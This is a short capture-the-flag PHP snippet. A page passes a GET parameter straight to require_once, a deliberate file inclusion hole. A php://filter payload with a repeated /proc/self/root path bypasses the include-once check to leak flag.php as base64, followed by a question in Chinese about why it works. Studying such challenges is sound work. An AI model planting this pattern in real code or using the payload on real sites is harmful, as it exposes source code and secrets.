<?php
highlight_file(__FILE__);
require_once('flag.php');
if(isset($_GET['file'])) {
require_once($_GET['file']);
}
payload为
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/www/wwwroot/www.yuxuanzhe.com/flag.php
为什么第一次require_once没有出现源码,第二次却出现了,require_once不是显示源码